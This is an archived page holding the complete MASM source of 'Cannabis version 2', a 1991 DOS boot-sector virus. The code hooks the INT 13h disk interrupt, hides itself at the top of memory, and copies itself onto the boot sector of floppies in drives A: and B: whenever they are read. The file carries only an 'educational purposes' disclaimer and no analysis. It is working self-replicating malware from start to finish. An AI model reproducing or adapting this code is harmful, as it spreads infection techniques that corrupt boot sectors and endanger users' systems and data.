home *** CD-ROM | disk | FTP | other *** search

---

/ HPAVC / HPAVC CD-ROM.iso / SOURCE.ZIP / CANNAB2.ASM

< prev

next >

Wrap

Assembly Source File  |  1991-12-05  |  9KB  |  264 lines

---

1. ;****************************************************************************
2. ;*  Cannabis    version 2
3. ;*
4. ;*  Compile with MASM 4.0
5. ;*  (other assemblers will probably not produce the same result)
6. ;*
7. ;*  Disclaimer:
8. ;*  This file is only for educational purposes. The author takes no
9. ;*  responsibility for anything anyone does with this file. Do not
10. ;*  modify this file!
11. ;****************************************************************************
12.  
13. cseg            segment
14.                 assume  cs:cseg,ds:cseg,es:nothing
15.  
16.                 .RADIX  16
17.  
18. BASE            equ     7C00
19.  
20.                 org     0
21.  
22. begin:          jmp     start
23.  
24.                 org     3
25.  
26.                 db      'CANNABIS'              ;BIOS parameter block
27.                 dw      0200
28.                 db      2
29.                 dw      1
30.                 db      2
31.                 dw      112d
32.                 dw      720d
33.                 db      0FDh
34.                 dw      2
35.                 dw      9
36.                 dw      2
37.                 dw      0
38.  
39.                 org     3E
40.  
41. start:          cli                             ;initialise segments + stack
42.                 cld
43.                 xor     ax,ax
44.                 mov     ds,ax
45.                 mov     ss,ax
46.                 mov     sp,7C00
47.  
48.                 mov     bx,offset ni13+BASE     ;check int13 vector
49.                 mov     ax,ds:[4*13]
50.                 cmp     ax,bx
51.                 je      installed
52.  
53.                 mov     ds:[oi13+BASE],ax       ;save old vector
54.                 mov     ax,ds:[4*13+2]
55.                 mov     ds:[oi13+2+BASE],ax
56.  
57.                 mov     di,0400                 ;adjust memory size
58.                 mov     ax,ds:[di+13]
59.                 dec     ax
60.                 mov     ds:[di+13],ax
61.  
62.                 mov     cl,6                    ;ES -> top
63.                 shl     ax,cl
64.                 sub     ax,07C0
65.                 mov     es,ax
66.  
67.                 mov     cx,0200                 ;copy virus to top
68.                 mov     si,sp                   ;SP=7C00
69.                 mov     di,sp
70.         rep     movsb
71.  
72.                 mov     ds:[4*13],bx            ;set new vector 
73.                 mov     ds:[4*13+2],es
74.  
75. installed:      xor     ax,ax
76.                 push    ss
77.                 pop     es
78.                 mov     bx,0078
79.                 lds     si,ss:[bx]              ;ds:si = int 1E (=table ptr)
80.                 push    ds
81.                 push    si
82.                 push    ss
83.                 push    bx
84.                 mov     di,7C3Eh                ;move table -> ds:7C3E
85.                 mov     cx,0Bh
86.         rep     movsb
87.                 push    es
88.                 pop     ds
89.                 mov     byte ptr [di-2], 0Fh    ;change values
90.                 mov     cx,ds:[7C18]
91.                 mov     [di-7],cl
92.  
93.                 mov     [bx+2],ax               ;table -> ds:7C3E
94.                 mov     word ptr [bx],7C3E
95.                 sti
96.                 int     13                      ;reset disk
97.                 jc      error
98.                 xor     ax,ax
99.                 mov     cx,ds:[7C13]            ;number of sectors
100.                 mov     ds:[7C20],cx
101.                 mov     ax,ds:[7C16]            ;calculate root-entry (FAT)
102.                 shl     ax,1
103.                 inc     ax
104.                 mov     ds:[7C50],ax            ;save value
105.                 mov     ds:[7C49],ax
106.  
107.                 mov     ax,ds:[7C11]            ;calculate IO.SYS entry
108.                 mov     cl,4
109.                 shr     ax,cl
110.                 add     ds:[7C49],ax
111.  
112.                 mov     bx,0500                 ;read directory
113.                 mov     ax,ds:[7C50]
114.                 call    readsector
115.                 jc      error
116.                 cmp     word ptr [bx], 'OI'     ;IO.SYS ?
117.                 jne     ibmtest
118.                 cmp     word ptr [bx+20], 'SM'  ;MSDOS.SYS ?
119.                 je      continue
120.                 jmp     short error
121.  
122. ibmtest:        cmp     word ptr [bx], 'BI'     ;IBMBIO.COM ?
123.                 jne     error
124.                 cmp     word ptr [bx+20], 'BI'  ;IBMDOS.COM ?
125.                 je      continue
126.  
127. error:          mov     si,offset errortxt+BASE   ;print error-message
128.                 call    print
129.                 xor     ax,ax
130.                 int     16                      ;wait for keypress
131.                 pop     si                      ;restore int 1E vector
132.                 pop     ds
133.                 pop     [si]
134.                 pop     [si+2]
135.                 int     19                      ;boot again...
136.  
137.  
138. continue:       mov     bx,0700                 ;read 3 sectors of IO.SYS
139.                 mov     cx,3                    ;at ds:0700
140.                 mov     ax,ds:[7C49]            
141.  
142. nextsec:        call    readsector
143.                 jc      error
144.                 inc     ax
145.                 add     bx,0200
146.                 loop    nextsec
147.  
148.                 mov     ch,ds:[7C15]            ;go to begin IO.SYS
149.                 mov     dl,0
150.                 mov     bx,ds:[7C49]
151.                 mov     ax,0
152.                 db      0EA, 0, 0, 70, 0
153.  
154.  
155. ;****************************************************************************
156. ;*              Read a sector
157. ;****************************************************************************
158.  
159. readsector:     push    ax
160.                 push    cx
161.  
162.                 div     byte ptr ds:[7C18]      ;al=sec/9 (0-160) ah=sec. (0-8)
163.                 cwd
164.                 inc     ah                      ;ah=1-9 (sector)
165.                 shr     al,1                    ;al=0-80 (track)
166.                 adc     dh,0                    ;dh=0/1 (head) dl=0 (drive)
167.                 xchg    ah,al
168.                 xchg    ax,cx
169.                 mov     ax,0201                 ;read it
170.                 int     13
171.  
172.                 pop     cx
173.                 pop     ax
174. return:         ret
175.  
176.  
177. ;****************************************************************************
178. ;*              Print message
179. ;****************************************************************************
180.  
181. print:          lodsb
182.                 or      al,al
183.                 jz      return
184.                 mov     ah,0Eh
185.                 mov     bx,7
186.                 int     10
187.                 jmp     short print
188.  
189.  
190. ;****************************************************************************
191. ;*              Int 13 handler
192. ;****************************************************************************
193.  
194. ni13:           push    ax
195.                 push    ds
196.                 cmp     ah,2                    ;funktion 2 (read) ?
197.                 jne     cancel
198.                 test    dl,0FEh                 ;drive A: or B: ? (head=0)
199.                 jnz     cancel
200.                 xor     ax,ax
201.                 mov     ds,ax
202.                 test    byte ptr ds:[043F],1    ;is drive active now?
203.                 jnz     cancel
204.  
205. infect:         push    cx
206.                 push    bx
207.                 push    di
208.                 push    si
209.                 push    es
210.                 mov     ax,0201                 ;read bootsector at 7E00
211.                 mov     bx,7E00
212.                 mov     cx,1
213.                 push    cs
214.                 push    cs
215.                 pop     es
216.                 pop     ds
217.                 pushf
218.                 push    cs
219.                 call    orgint13
220.                 jc      exit
221.  
222.                 mov     si,7E0Bh                ;move BPB to virus
223.                 mov     di,7C0Bh
224.                 mov     cl,33
225.         rep     movsb
226.  
227.                 mov     ax,0301                 ;write virus to boot-sector
228.                 mov     bx,7C00
229.                 mov     cl,1
230.                 pushf   
231.                 push    cs
232.                 call    orgint13
233.  
234. exit:           pop     es
235.                 pop     si
236.                 pop     di
237.                 pop     bx
238.                 pop     cx
239.  
240. cancel:         pop     ds
241.                 pop     ax
242. orgint13:       jmp     dword ptr cs:[oi13+BASE]   ;original vector
243.  
244.  
245. ;****************************************************************************
246. ;*              Data
247. ;****************************************************************************
248.  
249. oi13            dw      ?,?
250.  
251. errortxt        db      0Dh, 0Ah, 'Non-System disk or disk error'
252.                 db      0Dh, 0Ah, 'Replace and press a key when ready'
253.                 db      0Dh, 0Ah, 0
254.  
255.         
256.                 org     01FEh
257.  
258.                 db      55, 0AA
259.  
260. end:
261.  
262. cseg            ends
263.                 end     begin
264.